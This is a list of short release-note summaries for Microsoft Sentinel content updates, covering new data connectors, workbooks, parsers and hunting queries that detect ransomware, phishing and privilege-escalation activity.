Azure Security Benchmark solution updated to v3.0.5 with improved compliance monitoring logic, proper data connector declarations, and enhanced incident alert details. Read More →

Two hunting queries added targeting Gentlemen ransomware campaign artifacts including payload hashes and decentralized Web3/SaaS C2 infrastructure used by EtherRAT and TukTuk malware. Read More →

Microsoft Sentinel Logstash plugin updated to v2.2.1 with improved batch logging and comprehensive security warnings for vulnerable Logstash versions. Read More →

Workspace Usage Report workbook bumped to v1.6.5 with updated description mentioning Microsoft Sentinel and Defender support. Read More →

New hunting query provides hash-based detection for LockBit ransomware artifacts deployed via Apache ActiveMQ CVE-2023-46604 exploitation. Read More →

CrowdStrike API connector now supports multiple domain configurations with unique aliases, enabling organizations to ingest data from different CrowdStrike instances simultaneously. Read More →

New CCF connector enables ingestion of Airlock Digital application control logs, providing execution monitoring and file activity visibility to detect unauthorized software execution. Read More →

New AWS Security Hub compliance workbook provides executive dashboards and operational analytics for security findings, compliance tracking, and multi-account posture management. Read More →

New NordStellar solution delivers real-time threat intelligence and exposure monitoring via CCF Push architecture to unified NordStellar_CL table. Read More →

Added three hunting queries targeting identity boundary expansion techniques in Entra ID that escalate privileges without creating new accounts. Read More →

AWS S3 and CrowdStrike Falcon S3 Data Replicator connectors now support Usage table fallback queries for deployments using Basic/Auxiliary Log Analytics plans. Read More →

Complete Microsoft Sentinel solution integrating Bitdefender GravityZone multi-vector threat detection with DCR-based ingestion and XDR correlation. Read More →

New parsers enable normalization of Bitdefender GravityZone alert data into Microsoft Sentinel ASIM schema for unified threat detection. Read More →

Sonrai Security compliance tickets now integrate directly with Microsoft Sentinel through a new CCF push connector. Read More →

Legacy Function App connector replaced with two CCF connectors for independent security statistics and events ingestion. Read More →

VMware Workspace ONE Unified Endpoint Management platform now available in Microsoft Sentinel via CCF connector for device compliance monitoring and shadow IT detection. Read More →

Adds three-query pack detecting legacy auth bypass, guest account abuse, and post-reset privileged operations. Read More →

Adds hunting pack targeting device code phishing, service principal persistence, and bulk password resets by privileged actors. Read More →

Adds hunting query to detect hardware keystroke injectors spawning PowerShell through explorer.exe with evasion patterns. Read More →

Corrects broken hunting query that returned no results due to incorrect property name filter. Read More →